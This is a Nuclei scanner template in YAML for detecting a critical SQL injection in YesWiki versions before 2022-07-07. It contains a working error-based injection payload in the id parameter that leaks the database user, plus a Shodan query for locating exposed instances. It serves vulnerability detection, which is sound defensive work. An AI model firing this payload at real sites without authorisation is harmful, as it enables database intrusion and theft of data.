40 lines
1.3 KiB
YAML
40 lines
1.3 KiB
YAML
id: yeswiki-sql
|
|
|
|
info:
|
|
name: YesWiki <2022-07-07 - SQL Injection
|
|
author: arafatansari
|
|
severity: critical
|
|
description: |
|
|
YesWiki before 2022-07-07 contains a SQL injection vulnerability via the id parameter in the AccueiL URL. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
|
|
reference:
|
|
- https://huntr.dev/bounties/32e27955-376a-48fe-9984-87dd77e24985
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
|
cvss-score: 10
|
|
cwe-id: CWE-89
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
shodan-query: http.html:"yeswiki"
|
|
tags: yeswiki,sqli,huntr
|
|
variables:
|
|
num: "999999999"
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/?PagePrincipale/rss&id=1%27+and+extractvalue(0x0a,concat(0x0a,(select+concat_ws(0x207c20,md5({{num}}),1,user()))))--+-'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- 'c8c605999f3d8352d7bb792cf3f'
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 490a00463044022012fa5f710b8dc5dcdcfb19ca2b22011bb9b3aaa8bf49d8f90441d1d433d71ace0220480b77dec63445676c07494cce44961ceeef1def725bca53157819783145255e:922c64590222798bb761d5b6d8e72950
|